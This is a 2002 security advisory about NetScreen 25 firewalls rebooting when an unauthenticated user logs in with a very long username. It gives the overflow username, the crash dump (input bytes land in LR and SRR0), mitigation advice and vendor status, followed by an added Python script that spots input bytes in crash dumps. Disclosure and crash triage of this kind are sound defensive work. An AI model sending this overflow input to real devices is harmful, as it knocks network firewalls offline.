Netscreen 25 unauthorised reboot issue

From: quentynat_private
Date: Mon May 27 2002 - 10:33:31 PDT


    Please note that this advisory was prepared before speaking to
    NetScreen's US operation. Nothing of this vulnerability has been
    discussed here (or on vuln-dev), hence this email. Additionally, it is not
    shown on NetScreen's security alerts page
    (http://www.netscreen.com/support/alert.html) as of 25.05.2002.
    
    After speaking to their 3rd line support in the US (eventually) I was
    informed that this had been fixed.
    
    Indeed the problem *has* been fixed as of ScreenOS 3.0.1r2 (however, you
    have to look in the release notes to discover this - ref cs00232). I
    wonder how many people are still running affected firmware?
     
     #Synopsis
     
     A remote user (who is unauthenticated) can cause a NetScreen 25
    (other versions untested) to reboot remotely. Software version: 3.0.1r1.1,
    which was current as of about 1 month ago and has no alerts shown
    against it on NetScreen's security alerts page.
     
     #Method
     
     Log on to the NetScreen with a user name of
     
    
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     
     and the device reboots.
     
     This looks similar to
     http://www.net-security.org/vuln.php?id=577
     from a year ago.
     
     Remote syslog shows just that the device's interfaces came back up:
     
    
     May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra system-notification-00513: The physical state of the interface trust has changed to Up (2002-05-24 13:36:47)
     May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra system-notification-00513: The physical state of the interface untrust has changed to Up (2002-05-24 13:36:47)
     May 24 14:36:59 192.168.1.100 phaedra: NetScreen device_id=phaedra system-notification-00513: The physical state of the interface DMZ has changed to Up (2002-05-24 13:36:48)
    
    ##### Start of console output
    
    phaedra-> *******************************************************
                    Exception Dump
    *******************************************************
    System up time: 3 hours 20 minutes 48 seconds
    Exception(Instruction TLB Miss)
    GPR:
    R0: 78787878   R1: 03044e50  R2: 00470928  R3: 00000000
    R4: 03044e08   R5: 000000ac  R6: 0074bde8  R7: 78787878
    R8: 004c9d70   R9: 03a81d50  R10: 004fcb58 R11: 004d0000
    R12: 40000024  R13: 004d1344 R14: 000d0904 R15: 80020020
    R16: 43c00da1  R17: 300b6030 R18: 60101022 R19: 00000000
    R20: 00750000  R21: 00470000 R22: 00000001 R23: 00755078
    R24: 78787878  R25: 78787878 R26: 78787878 R27: 78787878
    R28: 78787878  R29: 78787878 R30: 78787878 R31: 78787878
    Special Register:
    CR: 20000024   XER: 00000000  LR: 78787878    CTR: 00000000
    MSR: 00021200  SRR0: 78787878 SRR1: 00029230  SRR2: 00300044
    SRR3: 00000000 DBSR: 00000000 TCR: fc000000   TSR: 04000000
    ESR: 00000000  DEAR: 00000000 PID: 00000000
    *******************************************************
                    Exception Dump
    *******************************************************
    System up time: 3 hours 20 minutes 48 seconds
    Exception(Machine Check)
    GPR:
    R0: 78787878   R1: 03044d68  R2: 00470928  R3: 00000000
    R4: 00000000   R5: 00000000  R6: 78787878  R7: 002fffd4
    R8: 004c9d70   R9: 00000000  R10: 000002ec R11: 00000020
    R12: 40000024  R13: 004d1344 R14: 000d0904 R15: 80020020
    R16: 43c00da1  R17: 300b6030 R18: 60101022 R19: 00000000
    R20: 00750000  R21: 00470000 R22: 00000001 R23: 00755078
    R24: 78787878  R25: 78787878 R26: 78787878 R27: 00000001
    R28: 03044d94  R29: 0000001f R30: 78787878 R31: 00000000
    Special Register:
    CR: 40000024   XER: 20000000  LR: 002fffd4    CTR: 00000000
    MSR: 00000000  SRR0: 78787878 SRR1: 00029230  SRR2: 00300044
    SRR3: 00021200 DBSR: 00000000 TCR: fc000000   TSR: 0c000000
    ESR: 00000000  DEAR: 00000000 PID: 00000000
    Trace Dump:
    00300044 002fffd4 002ff8f4 002fee04 00000000
    System Level:
    Image In Interrupt Level
    ********************************************************
            Please use GDB to track the trace
    ********************************************************
    ð
    
    NetScreen PowerPC 405GP BootROM V1.01
    (c)1997-2002 NetScreen Technologies Inc. All rights reserved
    
    Check Platform...... NS-25
    
    <snip normal netscreen start up>
    
    ###### End
    
    
     
    #Preliminary Conclusions
     
    Restrict the IPs that can connect to the web interface,
    and upgrade to the latest version of ScreenOS.
    
    #Vendor status
    
    They had (as mentioned above) already fixed this issue, but had (in my
    personal opinion) not publicized it very well, hence this post.
    
    
    
    Q
    
    -- 
    #####################
    Quentyn Taylor
    Sysadmin - Fotango
    #####################
    "I just went visual on this goofy looking Finn riding on a gnu, wielding
    one pissed off penguin...
    gah" 
       Bob The Sane
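
The exception dump in the post can be tied to the submitted username by checking which registers hold 0x78787878, four copies of the ASCII code for 'x'. The triage script below is an added example, not part of the original post or any NetScreen tooling; its function names are hypothetical and its sample is an excerpt of the first dump above.

```python
import re

# Excerpt copied from the first exception dump in the post (GPR rows R0-R7
# and R28-R31, plus the first two special-register rows).
DUMP_EXCERPT = """\
Exception(Instruction TLB Miss)
GPR:
R0: 78787878   R1: 03044e50  R2: 00470928  R3: 00000000
R4: 03044e08   R5: 000000ac  R6: 0074bde8  R7: 78787878
R28: 78787878  R29: 78787878 R30: 78787878 R31: 78787878
Special Register:
CR: 20000024   XER: 00000000  LR: 78787878    CTR: 00000000
MSR: 00021200  SRR0: 78787878 SRR1: 00029230  SRR2: 00300044
"""

# A register entry is an upper-case name (optionally numbered), a colon,
# and exactly eight hex digits; section labels such as "GPR:" do not match.
REG_RE = re.compile(r"\b([A-Z]+\d*):\s*([0-9a-fA-F]{8})\b")


def parse_registers(dump):
    """Return {register name: 32-bit value} for every 'NAME: hex' pair."""
    return {name: int(value, 16) for name, value in REG_RE.findall(dump)}


def filled_with_input(registers, marker):
    """List registers whose four bytes all equal the marker character.

    marker is the single character that was repeated in the submitted
    input ('x' for the username in the post).
    """
    pattern = int.from_bytes(marker.encode("ascii") * 4, "big")
    return sorted(name for name, value in registers.items() if value == pattern)


def control_flow_registers(hits):
    """Subset of hits that hold code addresses on PowerPC: the link
    register (LR) and the instruction address saved at the exception (SRR0)."""
    return [name for name in hits if name in ("LR", "SRR0")]


if __name__ == "__main__":
    regs = parse_registers(DUMP_EXCERPT)
    hits = filled_with_input(regs, "x")
    print("registers holding 'xxxx':", ", ".join(hits))
    print("of which code addresses:", ", ".join(control_flow_registers(hits)))
```

A dump from an unrelated fault would normally return an empty list for the marker character, which makes this a quick way to separate crashes caused by oversized login input from other reboots.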
    


